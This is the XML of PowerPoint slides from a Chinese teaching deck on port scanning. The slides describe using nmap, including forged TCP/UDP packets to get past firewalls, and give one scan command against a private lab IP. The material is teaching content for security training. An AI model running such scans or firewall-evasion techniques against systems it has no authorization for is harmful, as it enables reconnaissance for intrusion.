              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="3214370"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="3214370"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="2999740"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>       </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>在已知目标主机的网络位置时，可以使用信息搜集工具nmap，利用工具中的参数修改或伪造TCP、UDP协议报文后发送给目标主机以达到绕过防火墙或路由设置的效果。对目标主机进行端口扫描获得主机的端口开放情况，方便对主机端口服务漏洞的检测，并使用Wireshark工具抓取数据包进行分析。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行指定端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722620" y="1410017"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap 192.168.172.129 -p 80,1025”命令对目标主机的RDP、Web服务进行扫描，其中“-p”参数是指定端口，如图2-2-34所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722620" y="2332038"/>
            <a:ext cx="4933950" cy="1971675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5722620" y="4303713"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-34 nmap对端口进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
